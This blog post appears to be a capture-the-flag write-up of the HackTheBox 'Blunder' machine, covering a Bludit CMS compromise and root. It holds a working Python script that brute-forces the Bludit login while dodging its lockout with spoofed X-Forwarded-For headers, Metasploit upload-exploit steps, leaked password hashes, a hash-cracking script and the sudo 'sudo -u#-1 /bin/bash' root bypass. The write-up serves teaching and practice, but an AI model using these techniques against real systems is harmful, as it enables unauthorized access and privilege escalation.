HackTheBox Blunder Writeup – 10.10.10.191

Machine Name: BLUNDER

OS: LINUX

Points: 20

Difficulty: Easy

Maker: egotisticalSW

HackTheBox Blunder – 10.10.10.191 is an easy-rated, straightforward Linux box that doesn’t need much hard work to get root. I used the known Bludit CMS exploit in Metasploit (CVE-2019-16113) to get a reverse shell as www-data, and a few minutes of enumeration turned up a PHP database file containing the hashed passwords of three users. Cracking them and getting one password right got me the user. After getting the user I found that the well-known sudo bug CVE-2019-14287 applies here, which took me from user to root in a matter of seconds.

Enumeration

The Nmap scan shows that port 80 is the only open port; FTP on port 21 is closed.

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-01 17:19 +03
Discovered open port 80/tcp on 10.10.10.191
Not shown: 998 filtered ports
PORT   STATE  SERVICE VERSION
21/tcp closed ftp
80/tcp open   http    Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: A0F0E5D852F0E3783AF700B6EE9D00DA
|_http-generator: Blunder
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts
Aggressive OS guesses: HP P2000 G3 NAS device (91%), Linux 2.6.32 (90%), Linux 2.6.32 - 3.1 (90%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (90%), Linux 3.7 (90%), Linux 2.6.32 - 3.13 (89%), Linux 3.0 - 3.2 (89%), Linux 3.3 (89%), Infomir MAG-250 set-top box (89%), Ubiquiti AirOS 5.5.9 (89%)

The web server on port 80 hosts a website titled “Blunder | A blunder of interesting facts”. Other than that I couldn’t find anything interesting on the site itself.

When only a web server is exposed and no other services can be seen, the next step is fuzzing. As I was unsure which CMS (and which version) was in use, I fuzzed with the php, txt and html extensions so the fuzzer would pick up any files with those extensions along the way.

The fuzzer returned three results.

Checking install.php told me the CMS is Bludit, and todo.txt holds a list of tasks being worked on.

Finding Exploits

Now that I knew the CMS, I searched for exploits with searchsploit, which listed two entries for it.

The directory traversal exploit looked usable, but on reading it I saw that it needs valid credentials to work, which is exactly what I didn’t have.

An HTB user hinted that the username is right in front of us and only needs enumeration. So the user had to be either somewhere in the blog or the name mentioned in the to-do, and reading further I understood how to get the user and his credentials.

Once the CMS was confirmed, I learned from an article in the Bludit support forum that the login page to brute-force lives at http://[url]/admin/.

Within a few seconds I had the username and was ready to gather candidate passwords by building my own list. I had recently used a tool called CeWL: it spiders a given URL, collects the words it finds on the pages, and writes them as a wordlist to the file name you give it.

I built the list with the default settings, which crawl to a depth of 2 and keep words of at least 3 characters:

cewl -w list.txt http://blunder.htb 

Bruteforcing Using Burp Suite Intruder

CeWL returned around 329 candidate words. My next approach was to try them against the login form with Burp Suite Intruder to see whether any password from the list would work.


Unfortunately that attempt failed: Intruder exhausted the whole wordlist with no change in the response status for any request. Bludit blocks a client after repeated failed logins, so once the lockout kicked in every remaining attempt was rejected regardless of the password. This made me think there had to be another way to test the passwords, and I could see people talking about such a tool.

I found the tool after a couple of minutes of intense Googling.

Tool link:

https://rastating.github.io/bludit-brute-force-mitigation-bypass/

As the author describes it, Bludit counts failed logins per client IP, but it takes that IP from the X-Forwarded-For header when one is present. The tool therefore sends a fresh X-Forwarded-For value with every request, so the failure counter for any single “IP” never reaches the block threshold, and it reports when a password from the list logs in. I immediately copied the code and ran it to see how it works. The Python PoC the author published only runs against a list of auto-generated passwords, like this:

To make it work for my wordlist I had to change the code so that it reads each line of list.txt instead. I tried several approaches and kept failing; in the end the Python readlines() method is what did it. After several minutes of trial and error my final code was ready.

#!/usr/bin/env python3
# Bludit login brute-force based on rastating's PoC, modified to take the
# candidate passwords from a wordlist (the CeWL output) instead of a
# generated list. Bludit identifies the client by the X-Forwarded-For
# header when counting failed logins, so every attempt sends a different
# value and is never counted against the same "IP".
import re
import sys
import requests


def load_wordlist(path):
    """Return the non-empty lines of the wordlist with newlines stripped."""
    with open(path, encoding="utf-8", errors="ignore") as fh:
        return [line.rstrip("\r\n") for line in fh.readlines() if line.strip()]


host = 'http://blunder.htb'
login_url = host + '/admin/login'
username = 'fergus'
wordlist = load_wordlist('list.txt')
print('\n \x1b[6;30;42m' + 'Bruteforcing the password, please standby' + '\x1b[0m \n')

# The original PoC built its own list instead of reading a file:
# for i in range(50):                      # 50 incorrect passwords
#     wordlist.append('Password{i}'.format(i = i))
# wordlist.append('adminadmin')            # correct password at the end

for password in wordlist:
    # A fresh session per attempt: the CSRF token is tied to the session.
    session = requests.Session()
    login_page = session.get(login_url)
    match = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text)
    if not match:
        sys.exit('[-] Could not find tokenCSRF on the login page')
    csrf_token = match.group(1)
    print('[*] Bruteforcing {u}:{p}'.format(u = username, p = password))
    headers = {
        # The bypass: a different "client IP" on every request.
        'X-Forwarded-For': password,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
        'Referer': login_url
    }
    data = {
        'tokenCSRF': csrf_token,
        'username': username,
        'password': password,
        'save': ''
    }
    login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)

    # A successful login redirects to /admin/dashboard; a failure re-renders the form.
    if '/admin/dashboard' in login_result.headers.get('location', ''):
        print()
        print('SUCCESS: Password found!')
        print('Use {u}:{p} to login.'.format(u = username, p = password))
        print()
        break
else:
    print('[-] Wordlist exhausted without a match')

Running the script for a few seconds, it found the password.

I opened Metasploit, selected the Bludit exploit I had identified earlier (exploit/linux/http/bludit_upload_images_exec), set the username to fergus and the password to the one I had just found.

Metasploit executed the payload with those credentials and I had a meterpreter session.

From the meterpreter shell I spawned a proper TTY with:

python3 -c 'import pty; pty.spawn("/bin/bash")'

And now I have a proper TTY.

With a stable session as www-data, it was time to enumerate and get the user.

Getting User.txt

I wanted to see whether the installation directory held a config file that could give me a path to a user. I did not find a config file, but I did find two Bludit installations. Checking each of them, I found a PHP database file under /bludit-xxxxxxx/bl-content/databases/ that contained the hashed passwords of three users: admin, hugo and fergus.

  • bfcc887f62e36ea019e3295aafb8a3885966e265 – Admin
  • be5e169cdf51bd4c878ae89a0a89de9cc0c9d8c7 – Fergus
  • faca404fd5c0a31cf1897b823c695c85cffeb98d – Hugo

I tried both hashcat and an online cracker on the hashes. Hashcat kept aborting for me, but the online cracker cracked one of them successfully.

The cracked hash belongs to the user hugo, who is an administrator.

Knowing hugo’s password, I switched user and logged in as hugo.

user.txt was in hugo’s home directory and I grabbed it immediately.
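The online cracker is doing nothing more than hashing guesses and comparing. Here is the offline equivalent, added as an example for this writeup (it is not the author's script and not Bludit's code). It assumes Bludit's scheme of storing sha1(password . salt) in bl-content/databases/users.php, which means a user with an empty salt has a plain SHA-1 of the password, the only form a generic online lookup can match. The three hashes from the writeup are included as targets; their salts are not shown on the page, so the demo runs on constructed data and a constructed wordlist instead.

```python
#!/usr/bin/env python3
"""Offline check of Bludit-style password hashes against a wordlist.

Added example for this writeup: not the author's script and not Bludit's code.
Assumption: Bludit stores sha1(password . salt) as a hex digest in
bl-content/databases/users.php. A user whose salt is empty therefore has a
plain SHA-1 of the password, the only case a generic online lookup can match.
"""
import hashlib
from typing import Dict, Iterable, Optional

# Hashes as listed in the writeup (user names lower-cased, as Bludit stores them).
# Their salts are not shown on the page, so they are left for the reader to feed in.
BLUNDER_HASHES = {
    "admin": "bfcc887f62e36ea019e3295aafb8a3885966e265",
    "fergus": "be5e169cdf51bd4c878ae89a0a89de9cc0c9d8c7",
    "hugo": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
}


def bludit_hash(password: str, salt: str = "") -> str:
    """sha1(password . salt), hex-encoded, as Bludit computes it (assumption)."""
    return hashlib.sha1((password + salt).encode("utf-8")).hexdigest()


def crack(targets: Dict[str, str], wordlist: Iterable[str],
          salts: Optional[Dict[str, str]] = None) -> Dict[str, str]:
    """Return {user: password} for every target hash that a wordlist entry matches.

    targets: {user: hex_sha1}; salts: {user: salt}, users without a salt get "".
    Each candidate is hashed once per user (salts differ per user), and the
    search stops early once every target has been cracked.
    """
    salts = salts or {}
    found: Dict[str, str] = {}
    for raw in wordlist:
        candidate = raw.rstrip("\r\n")
        if not candidate:
            continue
        for user, target in targets.items():
            if user in found:
                continue
            if bludit_hash(candidate, salts.get(user, "")) == target.lower():
                found[user] = candidate
        if len(found) == len(targets):
            break
    return found


def demo() -> Dict[str, str]:
    """Constructed data: a salted user, an unsalted user, and one that stays uncracked."""
    salts = {"salted": "x7Gq", "plain": "", "uncracked": "zz"}
    targets = {
        "salted": bludit_hash("Winter2020", salts["salted"]),
        "plain": bludit_hash("interesting", salts["plain"]),
        "uncracked": bludit_hash("not-in-the-list", salts["uncracked"]),
    }
    # Constructed wordlist, newline-terminated like lines read from a file.
    words = ["blunder\n", "facts\n", "interesting\n", "Winter2020\n", "fergus\n"]
    return crack(targets, words, salts)


if __name__ == "__main__":
    print(demo())
    # Real use against the box: supply a wordlist file (the path is a placeholder).
    # with open("wordlist.txt", errors="ignore") as fh:
    #     print(crack(BLUNDER_HASHES, fh))
```

Feeding a users.php salt in through the salts argument is what separates this from a plain SHA-1 lookup: a salted hash will never appear in a precomputed table, which is why only one of the three hashes gave in to the online service.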

Privilege Escalation

Running sudo -l shows that hugo can run /bin/bash as any user except root, i.e. a (ALL, !root) /bin/bash entry. Checking the sudo version, the installed 1.8.2xxx release is affected by CVE-2019-14287, which was fixed in sudo 1.8.28.

Sudo version 1.8.25p1

The bug: the sudo security policy, “sudoers”, lets an administrator restrict which target users a command may be run as, so that a user’s privileges are limited to specific accounts. The issue appears when a sysadmin writes an entry such as:

jacob myhost = (ALL, !root) /usr/bin/chmod

This means that user jacob is allowed to run chmod as any user except root, a policy meant to limit access. It can be bypassed simply by passing the user ID -1, or its unsigned equivalent 4294967295, as in sudo -u#-1: the “!root” check compares the requested ID against root’s uid 0, which -1 (stored as 4294967295 in an unsigned uid_t) does not match, so the rule permits the command; the setresuid() call that follows treats -1 as “leave this ID unchanged”, and since sudo is already running as root, the command keeps uid 0 and runs as root.

Getting Root.txt

In our case hugo can run /bin/bash as everyone except root.

Following the example above I ran sudo -u#-1 /bin/bash and got a root shell.

That’s it, this is how Blunder was rooted. The user part was a bit tricky, but once the sudo version is known it takes hardly seconds to root; I’m not sure this is how it was supposed to be.
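To make the three steps of the bypass concrete, here is a small model of the vulnerable sudo logic, added as an example for this writeup (it is not sudo’s code and never invokes sudo). The function names are my own; the uid_t wrap-around, the (ALL, !root) comparison against uid 0 and the “-1 means unchanged” semantics of setresuid() are the real behaviours. The patched variant mirrors sudo 1.8.28, which rejects -1 and 4294967295 as an unknown user.

```python
#!/usr/bin/env python3
"""Why `sudo -u#-1` slips past a "(ALL, !root)" rule (CVE-2019-14287).

Added example for this writeup. It models the checks sudo made before 1.8.28
in plain Python and never invokes sudo; run it as any unprivileged user.
"""
import os
from typing import Optional

UID_MAX = 0xFFFFFFFF  # uid_t is an unsigned 32-bit integer on Linux


def parse_runas_uid(spec: str) -> int:
    """Parse the argument of -u the way the vulnerable sudo did.

    A numeric '#<n>' spec was read as a signed number and stored in an
    unsigned uid_t, so '#-1' silently becomes 4294967295.
    """
    if not spec.startswith("#"):
        raise ValueError("only numeric '#uid' specs are modelled here")
    return int(spec[1:], 10) & UID_MAX


def policy_allows(uid: int, excluded_uids=(0,)) -> bool:
    """'(ALL, !root)' permits any target uid except root's uid 0.

    4294967295 is not 0, so the exclusion never matches and the rule allows it.
    """
    return uid not in excluded_uids


def resulting_uid(current_uid: int, requested_uid: int) -> int:
    """setresuid()/setreuid() treat (uid_t)-1 as 'leave this id unchanged'.

    sudo is already running with uid 0 when it switches, so a request for
    uid -1 leaves the command running as root.
    """
    return current_uid if requested_uid == UID_MAX else requested_uid


def simulate(spec: str, sudo_uid: int = 0) -> dict:
    """Full path: parse -> policy check -> uid the command actually gets."""
    uid = parse_runas_uid(spec)
    allowed = policy_allows(uid)
    return {
        "parsed_uid": uid,
        "allowed": allowed,
        "runs_as": resulting_uid(sudo_uid, uid) if allowed else None,
    }


def patched_parse_runas_uid(spec: str) -> Optional[int]:
    """sudo 1.8.28 rejects the -1 / 4294967295 id as an unknown user; None here."""
    uid = parse_runas_uid(spec)
    return None if uid == UID_MAX else uid


if __name__ == "__main__":
    for spec in ("#1000", "#0", "#-1", "#4294967295"):
        print(spec, simulate(spec), "patched ->", patched_parse_runas_uid(spec))
    # Live check of the kernel side: asking for uid -1 changes nothing.
    if hasattr(os, "setresuid"):
        before = os.geteuid()
        os.setresuid(-1, -1, -1)
        print("euid before/after setresuid(-1, -1, -1):", before, os.geteuid())
```

The takeaway for defenders is in the simulate("#0") case: the rule does exactly what it says for the one uid it names, which is why a “!root” exclusion looked safe until the unsigned wrap-around was noticed.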

Thank you.

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n
